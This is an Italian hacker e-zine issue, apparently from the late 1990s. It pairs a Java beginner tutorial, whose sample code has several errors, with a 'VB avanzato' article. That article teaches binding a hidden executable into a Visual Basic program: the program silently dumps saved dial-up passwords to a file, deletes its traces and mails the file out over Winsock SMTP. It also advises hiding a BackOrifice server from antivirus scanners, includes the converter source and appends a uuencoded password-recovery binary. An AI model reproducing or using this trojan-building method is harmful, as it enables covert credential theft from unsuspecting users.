ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ JAVA TUTORIAL [ PRIMA PARTE ] ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

che cos'e' java???

Java e' un linguaggio di programmazione molto simile al c++ o al pascal
piuttosto che a un linguaggio di descrizione della pagina come HTML o a un
semplice linguaggio di skript come JavaSkript.
Piu' specifikatamente, java e' un linguaggio di programmazione orientato ad
oggetti (come il Visual Basic)sviluppato dalla Sun MicroSystems, ispirato al
C++ (quindi noterete molte somiglianze) ed e' stato progettato con lo scopo di
ottenere un prodotto di piccole dimensioni, semplice e portabile su diverse
piattaforme e sistemi operativi, sia a livello del kodice sorgente sia al
livello del kodice binario il ke signifika che i programmi java(sia applet
che applicazioni) possono essere eseguiti su qualunque komputer sia
installata una makkina java.


Va be' cmq se avete capito (o almeno avete letto) li' sopra avete compreso qual'e'
la differenza di java con gli altri linguaggi, cioe' la possibilita' di avere un
programma compatibile sulla maggior parte dei sistemi (Pentium, powerPC, SPARC)

Ekkovi uno schemino

Metodo per compilare i programmi tradizionale


/COMPILATORE PENTIUM -------> File binario Pentium
/
/
CODICE SORGENTE------COMPILATORE POWERPC-----> Flie binario PowerPC
\
\
\COMPILATORE SPARC ---------> File binario SPARC

Metodo programmi Java

CODICE SORGENTE-------->Compilatore Java------->Bytecode Java
indipendente
dalla piattaforma
|
|
/-------|------\
/ | \
/ | \
Pentium PowerPC SPARC

Ovviamente bisogna aver installati i Bytecode, cioe' speciali istruzioni di
makkina che non sono specifike per un particolare processore o computer.


Programmazione orientata ad oggetti
La programmazione orientata ad oggetti e' modellata in base al fatto che,
spesso, gli oggetti del mondo reale sono composti di oggetti piu' semplici di
vario genere.
Questa capacita' di combinare oggetti e' tuttavia solo un aspetto molto generale
della programmazione orientata ad oggetti; numerosi altri concetti e caratteri
stiche facilitano e rendono + flessibile la creazione e l'impiego di oggetti:
le classi rappresentano il + importante di questi aspetti.
Quando si scrivono programmi in un linguaggio orientato ad oggetti, non si
definiscono in realta' degli oggetti, ma classi di oggetti, ovvero modelli per
diversi oggetti con caratterisctiche simili.
Una classe incorpora le caratterisctiche di una famiglia particolare di oggetti

per esempio..... ALBERO
|
_________ |__________
/ | \
/ / \ \
/ / \ \
/ / \ \
/ / \ \
PINO ABETE QUERCIA BETULLA


\


Ecco...ALBERO fa da modello astratto che descriva le caratteristiche basilari
per poter far parte di questa categoria mentre PINO ABETE QUERCIA sono istanze
(oggetti) cioe' pur comportandosi come un albero si diversificano in base alle
caratteristiche di ognuno (un abete e' diverso da un pino anche se sono entrabi
alberi).

ATTRIBUTI
Gli attributi sono elementi che differenziano tra loro gli oggetti e ne
determinano l'aspetto, lo stato e altre qualita'. Gli attributi sono definiti
da variabili; tipi e nomi delle variabili sono deefiniti nella classe e ogni
oggetto puo' avere valori particolari per esse.Poiche' i valori delle variabili
possono variare da un'istanza all'altra, si parla di variabili istanza.
Questa puo' essere imposta al momento della creazione dell'oggetto e rimanere
immutata per tutta la vita di quest'ultimo, oppure essere modificata a piacere
durante l'esecuzione del programma. Cambiando il valore della variabile, si
modiFICAno ;) gli attributi dell'oggetto.


CREAZIONE DI UNA CLASSE

Adesso cominciamo a fare qualche cosa.......

class Makkina {

String marca
String colore
boolean statoMotore = false;

void avviaMotore() {
if (statoMotore == true)
System.out.println("Il motore e' gia' acceso.");
else {
statoMotore = true;
System.out.println("Il motore e' stato acceso.");
}
}

void mostraAttr() {
System.out.println("questa makkina e' una "
+ marca + " " + colore);
if statoMotore == true
System.out.println("Il motore ora e' acceso.");
else System.out.println("Il motore ora e' spento.");
}

public static void main (String args[]) {
Makkina m= new Makkina();
m.marca = "Ferrari 350";
m.colore = "rossa";
System.out.println("Chiamo mostraAttr...");
m.mostraAttr();
Syetem.out.println("___");
System.out.println("Avvio il motore...");
m.avviaMotore();
System.out.println("___");
System.out.println("Chiamo mostraAttr...");
m.mostraAttr();
System.out.println("___");
System.out.println("Avvio il motore...");
m.avviaMotore();
}
}

Compilate la classe........

La prima riga dikiara il metodo main() ...mmmm...forse di questo e' meglio
parlare la volta prossima
La riga 2, Makkina m = new Makkina(), genera una nuova istanza della classe
Motocicletta e pone nella variabile m un riferimento a essa.Cmq solitamente,
nei programmi java, non si opera direttamente sulle classi, ma si generano
oggetti dalle classi e si richiamano i metodi degli oggetti.
Le righe 5 e 6 richiamano il metodo mostraAttr(), definito nell'oggetto
makkina (per la precisione la righa 6 richiama il metodo, mentre la righa 5
stampa l'avviso che si sta' per richiamare il metodo).
Il nuovo oggetto makkina stampa i valori delle sue variabili istanza(marca,
colore, impostate nelle righe precedenti) e comunicache il motore e' spento.
La righa 7 stampa una linea di separazione sullo schermo, a fini puramente
estetici.
LA righa 9 richiama il metodo avviaMotore() dell'oggetto makkina, per avviare
il motore.
Il motore e' ora acceso.
La righa 12 stampa nuovamente i valori delle variabili istanza. Ora il
motorerisulta acceso.
La righa 15 tenta di accendere di nuovo il motore; poiche' questo e' gia' acceso,
viene stampato il messaggio: "Il motore e' gia' acceso".

Okki, per questa 1°(e scarsa) uscita ho finito

bbbbbbbbbyyyyyyyyeeeeeeeeee!!!!!!!!

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

INTERVALLO by N0bodY88

Scrivo queste poke righe solo x dirvi di prepararvi mentalmente al contenuto dei
prossimi articoli sulla programmazione postati dal mitico Master, anke se ankora
adesso non ci credo che abbia scritto x noi! Adesso vi lascio a questa lettura,
sperando che dopo tutti questi tutorial e tutti questi art. di Master vi venga
almeno una minima idea di comincirae a programmare :)))

N0bodY88
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ VB AVANZATO ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Sistema per includere in un unico PE generato da visual basic piu' programmi.

Vi hanno detto che non e' possibile. In effetti e' vero, per farlo bisogna
ricorrere ad un trucco abbastanza semplice anche se un po' laborioso.

Cosa e' possibile fare, con questo sistema, per un utente malizioso?

es:

1. Unire ad un programma proprio un altro da far partire in maniera invisibile
2. Collegare due programmi tra loro tipo il silkerope.
3. Iglobare in un compilato vb un altro programma qualunque (proveniente cioe'
da un qualunque altro compilatore) rendendolo oltretutto assolutamente invisibile ad
ogni controllo. (anche il server di una backdoor quindi.)


La tecnica e' semplice. Praticamente bisogna fare una procedura primaria che
converta il programma da inglobare in una immagine binaria da inserire nel
nostro sorgente.
Facciamo un caso semplice:

il programma prova.exe contenente solo tre byte ( ABC ) deve essere inglobato in
un sorgente vb.

si convertono tutti i byte di prova.exe nel loro equivalente decimale e si inseriscono
formattati a tre cifre decimali in una variabile stringa:

A=065, B=066, C=067 quindi C(1)="065066067"

il passo successivo sara' una procedura che reimpostera' il programma originale:

' Il programma originale prova.exe
Dim C(1) as String
C(1)="065066067"

' Il programma reimpostato
Open "prova.exe" for Output as #1
for n=1 to 3
Print #1, Chr$(Mid$(c(1), (n - 1) * 3 + 1, 3));
Next n
Close #1

un successivo passo tipo

alfa=Shell("prova.exe",0)
...
Kill("prova.exe")

potrebbe provvedere all'esecuzione invisibile all'eliminazione successiva del programma
-ricreato- al fine di non lasciare orme rintracciabili.

problemi e limitazioni:

Il vb 5 essendo full 32b gestisce i programmi a 16b o dos con meno disinvoltura rispetto
alle versioni precedenti percui per non avere problemi di conflitto spesso e' meglio
compilarsi questo tipo di programmi col visual basic 4.. cio' non toglie che anche il 5 nel
99.9% dei casi faccia egregiamente il suo lavoro.

Ogni programma cosi' inglobato e' rappresentato da una immagine di se che solitamente e' dalle
3 alle quattro volte superiore come dimensioni rispetto a quelle originali.
DialupPassword passa -trasformato- da 16k a circa 56k.


.. finita la teoria, la pratica. Un esempio 'reale' di cio' che e' possibile fare.

Mettiamo di avere il sorgente di un nostro programma "A" al quale vogliamo unire
un tool gia' preconfezionato per il recupero delle passowrd di connessione e
successivamente provvedere all'invio di queste ultime ad un indirizzo email a noi noto.
(Il tool per recuperare le passowrd di connessione si chiama dialupPassword e lo trovate
codificato uuencode alla fine di questo articolo)

Serve come prima cosa un programma che ci converta il file dialuppassword nella sua
immagine binaria.

Allora rinominiamo DialupPassword.exe come p.exe (meglio usare nomi poco didascalici)

Serve a questo punto un tool di conversione, questo l'ho fatto in C per ovviare ad un
evidente problema di velocita', in visual basic impiegava una vita per convertire
file di una certa dimensione. (cmq lo trovate anche questo gia compilato e unito in fondo
all'articolo come VBC.exe.)

Ho chiamato questo semplice ma efficacissimo tool VBC (visual basic converter)
funziona cosi: avendo un file PIPPO.exe da convertire lo si passa al VBC con questa
sintassi

VBC pippo.exe

il converter creera' una immagine binaria del file pippo.exe chiamandola pippo.ex_

Il sorgente del programma VBC per chi volesse ricompilarselo da se e' questo:
-------------------------------------------------------------
#include <stdio.h>
#include <string.h>
#define MAX_RIGA=20
void main(n,file)
int n;
char *file[];
{
char *p,*w;
FILE *CREA_FILE, *CONVERTI;
long k=0,i=0,f=0;
CONVERTI=fopen(file[1],"rb");
p=file[1];
p[strlen(p)-1]='_';
CREA_FILE=fopen(p,"wb");
fprintf(CREA_FILE,"C(%ld)=\"",k);
k++;
while(!feof(CONVERTI))
{
w=fgetc(CONVERTI);
if(w>=100) fprintf(CREA_FILE,"
%d",w);
else if(w>=10&&w<=99) fprintf(CREA_FILE,"
0%d",w);
else if(w>=0&&w<=9) fprintf(CREA_FILE,"
00%d",w);
i++;f=1;
if(i>=MAX_RIGA)
{
fprintf(CREA_FILE,"
\"%c%cC(%ld)=\"",13,10,k);
k++;i=0;f=0;
}
}
if(f==1)fprintf(CREA_FILE,"
\"%c%c",13,10);
fclose(CONVERTI);
fclose(CREA_FILE);
}
-------------------------------------------------------------

VBC p.exe creera' allora il file p.ex_ il quale contiene queste righe:

C(0)="077090080000002000000000004000015000255255000000184000000000"
C(1)="000000000000064000026000000000000000000000000000000000000000"
C(2)="000000000000000000000000000000000000000000000000000000000000"
C(3)="000001000000186016000014031180009205033184001076205033144144"
C(4)="084104105115032112114111103114097109032109117115116032098101"
C(5)="032114117110032117110100101114032087105110051050013010036055"

.....

C(786)="000000000000000000000000000000000000000000000000000000000000"
C(787)="000000000000000000000000000000000000000000000000000000000000"
C(788)="000000000000000000000000000000000000000000000000000000000000"
C(789)="000000000000000000000000000000000000000000000000000000000000"
C(790)="000000000000000000000000000000000000000000000000000000000000"
C(791)="000000000000000000000000000000000000000000000000000000000000"
C(792)="000000000000000000000000000000000000000000000000000000000000"
C(793)="000000000000000000000000000000000000"


Queste sono le definizioni del vettore stringa C() da inserire con copia e
incolla nel nostro sorgente VB.

Creeremo quindi una procedura cosi':

-------------------------------------------------------------------
Private Sub Command1_Click()
' Vettore stringa C dimensionato relativamente al numero di stringhe
' generate da VBC
Dim c(793) As String

' Copia e incolla da p.ex_
C(0)="077090080000002000000000004000015000255255000000184000000000"
C(1)="000000000000064000026000000000000000000000000000000000000000"
C(2)="000000000000000000000000000000000000000000000000000000000000"
C(3)="000001000000186016000014031180009205033184001076205033144144"
C(4)="084104105115032112114111103114097109032109117115116032098101"
C(5)="032114117110032117110100101114032087105110051050013010036055"

.....

C(786)="000000000000000000000000000000000000000000000000000000000000"
C(787)="000000000000000000000000000000000000000000000000000000000000"
C(788)="000000000000000000000000000000000000000000000000000000000000"
C(789)="000000000000000000000000000000000000000000000000000000000000"
C(790)="000000000000000000000000000000000000000000000000000000000000"
C(791)="000000000000000000000000000000000000000000000000000000000000"
C(792)="000000000000000000000000000000000000000000000000000000000000"
C(793)="000000000000000000000000000000000000"

'ESEMPIO DI UTILIZZO
'RIGENERA IL FILE PER IL RECUPERO DELLE PASSWORD

Open "prova.exe" For Output As #1
For n = 0 To 793
For i = 1 To Len(c(n)) / 3
Print #1, Chr$(Mid$(c(n), (i - 1) * 3 + 1, 3));
Next i
Next n
Close #1

' CREA UN FILE BATCH PER l'ESECUZIONE CON PARAMETRI DEL PROGRAMMA
' RIGENERATO, LO ESEGUE E CREA UN FILE PASS.TXT CONTENENTE TUTTE
' LE PASSWORD DI CONNESSIONE (IN CHIARO) SALVATE PRECEDENTEMENTE

Open "vai.bat" For Output As #1
Print #1, "prova > pass.txt"
Print #1, "del prova.exe"
Print #1, ""
Close #1
alfa = Shell("vai.bat", 0)

End Sub
-------------------------------------------------------------------

RUN.. e nella dir dentro la quale si e' compilato il programma sopra ci
troveremo un file di testo chimato.

PASS.txt

contenente le password di connessione.
Il programma DialupPassword ha eseguito il suo lavoro restando pero' completamente
mistificato all'interno di un unico e 'rassicurante' file VB.

emh.. giusto per chi fosse curioso, il server di backorifice compattato con wwpack32
e passato al VBC diventa circa 250k .. sarebbero da considerare quindi nel proprio
programma visual basic 300/350k in piu' rispetto al normale dimensionamento, anche se
ovviamente il fatto di avere un server pronto a partire attaccato assieme al proprio
tool e completamente invisibile a TUTTI gli antivirus potrebbe richiamare dei
notevoli vantaggi.. anche in relazione al fatto che il piu' agile Silkerope e' abbastanza
malvisto dai vari antivirus che dichiarano i suoi prodotti come programmi sospetti.

Finito. ;-) .. ah gia... manca la parte piu' interessante: come spedire
il file pass.txt ad un indirizzo email.

Si potrebbe usare uno dei tanti programmi freeware
che si trovano in rete ed eseguirli con shell.
Si potrebbe usare un ocx apposito tipo SMTP.OCX.
Il sistema che vi mostro e' decisamente piu' sempice ed oltretutto spiega un metodo generale
col quale e' possibile inviare dati via http, ftp, smtp, pop, sock, ecc..

Richiede solamente l'utilizzo del WInsock.. l'ocx col quale in effetti e' possibile fare
veramente di TUTTO.

Spedire una mail col winsock e' una procedura analoga a quella usata con telnet.

Cosa occorre:

Soltanto due cose:

1. un server SMTP possibilmente col relay ..
altimenti la vostra mail non arrivera' mai.
(La cosa migliore sarebbe usare il server smtp del tizio che -usera'- il programma..
..lui sicuramente il relay sul suo server smtp ce l'ha! ;-)

2. Queste istruzioni da inserire in una procedura Visual basic dopo aver attivato
e trascinato sul form principale il controllo winsock:
(Vanno bene in pratica sia il MS-winsock che il Winsock degli intranet activeX.)

' Passo 1.. collegarsi al server smtp:

' Per dare il tempo ai dati di arrivare..
' occorre dopo ogni comando aspettare n secondi
' la procedura delay(n) blocca l'esecuzione
' per il tempo necessario appunto.
Private Sub delay(n)
S = Timer:Do While Timer<S+n:DoEvents:Loop
End Sub

' Ci si connette al server mail (come con telnet)
winsock.Connect "mail.cuccurullo.it", 25
delay (6)

' Si manda il comando HELO(necessario)
Data = "HELO ciao" & vbCrLf
winsock.SendData Data
delay (6)

' Si manda il comando MAIL FROM:
Data = "MAIL FROM: prova@mio.it" & vbCrLf
winsock.SendData Data
delay (6)

' Si manda il comando RCPT TO:
Data = "RCPT TO: da@spedire.it" & vbCrLf
winsock.SendData Data
delay (6)

' Si manda il comando DATA
Data = "DATA" & vbCrLf
winsock.SendData Data
delay (6)

' Corpo dell'articolo
' Io ho ipotizzato un articolo a Subject: -Prova- contenente
' nel BODY la sola parola -Arrivato- ma nulla vieta di
' caricare nel data il testo del file pass.txt prima creato. ;-)
Data = "Subject:prova" + vbCrLf + vbCrLf + "Arrivato" & vbCrLf
winsock.SendData Data
delay (6)

' Comando di conferma spedizione per il sendmail
Data = "." & vbCrLf
winsock.SendData Data
delay (6)
winsock.Close



In breve la procedura senza tanti help e' questa:

-------------------------------------------------------------------
Private Sub Command1_Click()
winsock.Connect "mail.cuccurullo.it", 25:delay (6)
Data = "HELO ciao" & vbCrLf
winsock.SendData Data
delay (6)
Data = "MAIL FROM: prova@mio.it" & vbCrLf
winsock.SendData Data
delay (6)
Data = "RCPT TO: da@spedire.it" & vbCrLf
winsock.SendData Data
delay (6)
Data = "DATA" & vbCrLf
winsock.SendData Data
delay (6)
Data = "Subject:prova" + vbCrLf + vbCrLf + "Arrivata" & vbCrLf
winsock.SendData Data
delay (6)
Data = "." & vbCrLf
winsock.SendData Data
delay (6)
winsock.Close
End Sub

Private Sub delay(n)
S = Timer:Do While Timer<S+n:DoEvents:Loop
End Sub
-------------------------------------------------------------------

E'uguale a telnet in linea di principio ...o no!? ;-)

Ed ovviamente con lo stesso sistema nessuno vieta di fare un progr per mandare aricoli ad un
ng via nntp, recuperare pagine da http o altro.
Questo infatti e' a tutti gli effetti un sistema per poter usufruire di un clone virtuale
di telnet all'interno di un programma VB.
Considerato che il winsock.ocx e' una libreria normalmente registrata da tutti gli utenti
e che le procedure sopra riportate non richiedono particolari versioni del medesimo..
non mi resta altro che augurarvi

.. buon lavoro. ;-)

Master-Hacker

------------------------ SEZIONE SUPPORTI

begin 644 DialupPassword.exe
M35I0``(````$``\`__\``+@`````````0``:````````````````````````
M``````````````````````$``+H0``X?M`G-(;@!3,TAD)!4:&ES('!R;V=R
M86T@;75S="!B92!R=6X@=6YD97(@5VEN,S(-"B0W````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M`````````````````````````````````````````%!%``!,`0@`&5Y"*@``
M````````X`"
.@0L!`AD`*@```!````````!P.0```!````!``````$```!``
M```"```!``````````0``````````+`````$`````````P``````$```0```
M```0```0````````$````````````````&```(@$````H```````````````
M````````````````D```$`,```````````````````````````````````"
`
M```8````````````````````````````````````````````````````````
M````````````0T]$10````"4*0```!`````J````!```````````````````
M(```8$1!5$$`````J`````!``````@```"
X``````````````````$```,!"
M4U,``````+D$````4``````````P``````````````````````#`+FED871A
M``"
(!````&`````&````,```````````````````0```P"YT;',`````"```
M``!P`````````#8``````````````````````,`N<F1A=&$``!@`````@```
M``(````V``````````````````!```!0+G)E;&]C```0`P```)`````$````
M.```````````````````0```4"YR<W)C``````````"@`````@```#P`````
M`````````````$```%``````````````````L``````````^````````````
M``````!```!0````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M`````````````````````````````````````````````/\E!&%``(O`_R4`
M84``B\#_)?Q@0`"+P/\E^&!``(O`_R7T8$``B\#_)?!@0`"+P/\E[&!``(O`
M_R7H8$``B\#_)>1@0`"+P/\EX&!``(O`_R7<8$``B\#_)=A@0`"+P/\E$&%`
M`(O`_R748$``B\#_)=!@0`"+P/\ES&!``(O`_R7(8$``B\#_)<1@0`"+P/\E
MP&!``(O`_R6\8$``B\#_);A@0`"+P/\EM&!``(O`_R6P8$``B\#_)2!A0`"+
MP/\E'&%``(O`_R4884``B\#_):Q@0`"+P/\E*&%``(O`4X/$O+L*````5.BA
M____]D0D+`%T!0^W7"
0PB\.#Q$1;PXO`_R6H8$``B\#_):1@0`"+P/\EH&!`
M`(O`_R6<8$``B\#_)9A@0`"
+P/\EE&!``(O`_R608$``B\#_)8Q@0`"+P%-6
MOAQ40`"
#/@!U.FA$!@``:@#HJ/___XO(A<EU!3/`7EO#H1A40`")`8D-&%1`
M`#/2B\(#P(U$P02+'HD8B09"
@_ID=>R+!HL0B19>6\.0B0")0`3#B\!35HOR
MB]CHG?___X7`=04SP%Y;PXL6B5`(BU8$B5`,BQ.)$(E8!(E"
!(D#L`%>6\.+
M4`2+"(D*B5$$BQ4<5$``B1"C'%1``,-35E=548OQB10DB^B+70"+!"2+$(D6
MBU`$B58$BSN+0PB+T`-3##L6=12+P^BW____BT,(B0:+0PP!1@3K%HL6`U8$
M.\)U#8O#Z)K___^+0PP!1@2+WSOK=<*+UHO%Z%7___^$P'4$,\")!EI=7UY;
MPXU``%-65U6#Q/B+V(O[BS*+0P@[\')LB\X#2@2+Z`-K##O-=UX[\'4;BT($
M`4,(BT($*4,,@WL,`'5$B\/H-?___^L[BPJ+<@0#SHOX`WL,.\]U!2ES#.LF
MBPH#2@2)#"
0K^8E\)`2+$BO0B5,,B]2+P^C0_O__A,!U!#/`ZPRP`>L(BQL[
M^W6%,\!96EU?7EO#D%-65XO:B_"!_@``$`!]![X``!``ZPR!QO__``"!Y@``
M__^)<P1J`6@`(```5FH`Z/C]__^+^(D[A?]T(XO3N"!40`#H;/[__X3`=1-H
M`(```&H`BP-0Z-G]__\SP(D#7UY;PY!35E=5B]F+\HOHQT,$```0`&H$:``@
M``!H```0`%7HI?W__XOXB3N%_W4?@<;__P``@>8``/__B7,$:@1H`"
```%95
MZ(#]__^)`X,[`'0CB].X(%1``.CU_?__A,!U$V@`@```:@"+`U#H8OW__S/`
MB0-=7UY;PY!35E=5@\3LB4PD!(D4),=$)`C_____,]*)5"
0,B^B+!"0#Q8E$
M)!"
+'2!40`#K48L[BW,(.^YW1HO&`T,,.T0D$'<[.W0D"',$B70D"(O&`T,,
M.T0D#'8$B40D#&@`@```:@!6Z._\__^%P'4*QP7\4T```0```(O#Z(K]__^+
MWX'[(%1``'6GBT0D!#/2B1"#?"0,`'09BT0D!(M4)`B)$(M$)`PK1"0(BU0D
M!(E"
!(/$%%U?7EO#4U9758/$](E,)`2)%"2+T(OJ@>4`\/__`Q0D@<+_#P``
M@>(`\/__B50D"
(M$)`2)*(M$)`@KQ8M4)`2)0@2+-2!40`#K/(M>"(M^#`/[
M.^MV`HO=.WPD"
'8$BWPD"#O[=AYJ!&@`$```*_M74^@F_/__A<!U"HM$)`0S
MTHD0ZPJ+-H'^(%1``'6\@\0,75]>6\.+P%-65U51B]B+\X'&_P\``('F`/#_
M_XDT)(OK`^J!Y0#P__^+!"2)`8O%*P0DB4$$BS4@5$``ZSB+7@B+?@P#^SL<
M)',#BQPD.^]S`HO]._MV'&@`0```*_M74^BM^___A<!U"
L<%_%-```(```"+
M-H'^(%1``'7`6EU?7EO#C4``4U9758/$^(ORB_B],%1``(''_S\``('G`,#_
M_XM=`.LS.WL,?RR+SHO7BT,(Z+K^__^#/@!T4(M&!`%#"
(M&!"E##(-[#`!U
M/HO#Z.S[___K-8L;.]UUR8O6B\?H]_S__X,^`'0AB\R+UHO%Z./[__^#/"
0`
M=:6+S(M6!(L&Z+']__\SP(D&65I=7UY;PXO`4U9758/$[(D,)(OZB_"],%1`
M`(''_S\``('G`,#__XM=`.L"
BQL[W70%.W,(=?4[<PAU5SM[#`^.E@```(U,
M)`2+URM3#(M#"`-##.C;_/__@WPD!`!T,XU,)`R-5"0$B\7H7?O__X-\)`P`
M=;&-3"0,BU0D"(M$)`3H)?W__XL$)#/2B1#ID````(U,)`2+UXO&Z)3\__^#
M?"0$`'0TC4PD#(U4)`2+Q>@6^___@WPD#``/A6;___^-3"0,BU0D"(M$)`3H
MVOS__XL$)#/2B1#K2(MK"
#OU=3H[>PQ_-8L,)(O7B\7H<?W__XL$)(,X`'0H
MBP0DBT`$`4,(BP0DBT`$*4,,@WL,`'40B\/HFOK__^L'BP0D,]*)$(/$%%U?
M7EO#D%-65X/$[(OYB10DC9C_/P``@>,`P/__BS0D`_"!Y@#`__\[WG-;B\^+
MUBO3B\/HF?W__XU,)`2+U[@P5$``Z%WZ__^+7"
0$A=MT'XU,)`R+5"0(B\/H
M)OS__XM$)`R)1"
0$BT0D$(E$)`B#?"0$`'04C50D!+@P5$``Z)7Z___K!#/`
MB0>#Q!1?7EO#58OL,])5:(880`!D_S)DB2)H`%1``.@Y^?__@#TM4$```'0*
M:`!40`#H+OG__[@@5$``Z(SY__^X,%1``.B"
^?__N%Q40`#H>/G__VCX#P``
M:@#HW/C__Z-85$``@SU85$```'0ON`,```"+%5A40``SR8E,@O1`/0$$``!U
M[+A`5$``B4`$B0"
C3%1``,8%^%-```$SP%I9662)$&B-&$``@#TM4$```'0*
M:`!40`#HK_C__\/I30\``.OEH/A30`!=PU6+[%.`/?A30```#X3.````,])5
M:&P90`!D_S)DB2*`/2U00```=`IH`%1``.AF^/__Q@7X4T```*%85$``4.@T
M^/__,\"C6%1``(L=(%1``.L2:`"```!J`(M#"%#H)?C__XL;@?L@5$``=>:X
M(%1``.B)^/__N#!40`#H?_C__[A<5$``Z'7X__^A&%1``(7`=!>+$(D5&%1`
M`%#HUO?__Z$85$``A<!UZ62/!0````"
#Q`AH<QE``(`]+5!```!T"F@`5$``
MZ-/W__]H`%1``.C1]___P^EG#@``Z]M;7<.+P%,[!4Q40`!U"
8M0!(D53%1`
M`(M0!(M("('Y`!```'\J.\)U$,'I`J%85$``,]*)5(CTZQW!Z0*+'5A40`")
M5(OTBP")`HE0!%O#BP")`HE0!%O#D(L57%1``.L0BTH(.\%R!P-*##O!<A:+
M$H'Z7%1``'7HQP7\4T```P```#/2B\+#D%.+RH/I!(T<`8/Z$'P/QP,'``"`
MB]'HH0$``%O#@_H$?`R+RH')`@``@(D(B0M;P_\%[%-``(O0@^H$BQ*!XOS_
M_W^#Z@0!%?!30`#HQP4``,.+P(/Z#'P.@\H"
B1"#P`3HRO___\.#^@1\"HO*
M@<D"``"`B0@#PH,@_L-35HO0@^H$BQ*+RH'A`@``@('Y`@``@'0*QP7\4T``
M!````(O:@>/\__]_*\.+R#,1]\+^____=`K'!?Q30``%````]@$!=""+T(/J
M#(MR""O&.W`(=`K'!?Q30``&````Z)K^__\#WHO#7EO#C4``4U97B]@S_XL#
MJ0```(!T"R7\__]_`_@#V(L#J`)U$XOSB\;H:/[__XM&"`/X`]B#(_Z+QU]>
M6\-35E=5@\3XB_J+\(O&Z)K^__^+V(MK"(O%`T,,B]"-##<KT8/Z#'\$B_@K
M_HO&*\6#^`Q]$HO,B]8K4P@#UXO%Z-_[___K#XO,B]>#Z@2-1@3HSOO__XLL
M)(7M=00SP.LPB]4KUHO&Z'#^__^+Q0-$)`2+4P@#4PP[PG,*C10W*]#HJO[_
M_XO4B\/HJ?;__[`!65I=7UY;PU-65XORB_B+WXES"(O#`\:#Z`R)<`B!_@`0
M``!_,(O6P>H"
H5A40`"+1)#TA<!U$*%85$``B5R0](E;!(D;ZSJ+$(E#!(D3
MB1B)6@3K+('^`#P``'P-B]:+Q^@)____A,!U%Z%,5$``B1U,5$``BQ"
)0P2)
M$XD8B5H$7UY;PXO`@SU05$```'Y`@SU05$``#'T,QP7\4T``!P```.LKH5!4
M0`"#R`*+%5140`")`J%45$``@\`$Z+G]__\SP*-45$``,\"C4%1``,.+P%-6
M5X/$\(OPC3PDI:6+_.B@____C4PD"
(O7N%Q40`#H//7__XM<)`B%VW4$,\#K
M4HL'.]AS"NBY_?__*0<!1P2+!P-'!(OS`W0D##O&<PCH$/[__P%'!(L'`T<$
M._!U$8/H!+H$````Z`O]__^#;P0$BP>C5%1``(M'!*-05$``L`&#Q!!?7EO#
MC4``4X/$^(O8B]2-0P3H</C__X,\)`!T"
XO$Z%?___^$P'4$,\#K`K`!65I;
MPY!35H/$^(ORB]B+S(U6!(O#Z,_X__^#/"0`=`N+Q.@F____A,!U!#/`ZP*P
M`5E:7EO#C4``,]+!Z`(]``0``'<6BQ585$``BU2"
](72=0A`/0$$``!UZHO"
MPXU``%-65U6+\+],5$``O5!40`"
+'4140``[<P@/CH0```"+'XM#"#OP?GN)
M<PB+6P0[<PA_^(L7B4((.Q]T!(D?ZV.!_@`0``!_#8O&Z(G___^+V(7;=4Z+
MQN@<____A,!U!S/`Z8@````[=0!_I"EU`(-]``Q]"`-U`#/`B44`H5140``!
M-5140`"+UH/*`HD0@\`$_P7L4T``@^X$`37P4T``ZTR+P^@V^___BU,(B\(K
MQH/X#'P,B],#UI+H8/W__^L2B_(['W4%BT,$B0>+PP/&@R#^B\.+UH/*`HD0
M@\`$_P7L4T``@^X$`37P4T``75]>6\-5B^R#Q/A35E>+V(`]^%-```!U$^@K
M^?__A,!U"
C/`B47\Z50!```SR55H`"!``&3_,62)(8`]+5!```!T"F@`5$``
MZ%CR__^#PP>#X_R#^PQ]!;L,````@?L`$```#X^3````B\.%P'D#@\`#P?@"
MBQ585$``BU2"
](72='F+\HO&`\.#(/Z+0@0[T'4:B\.%P'D#@\`#P?@"BPU8
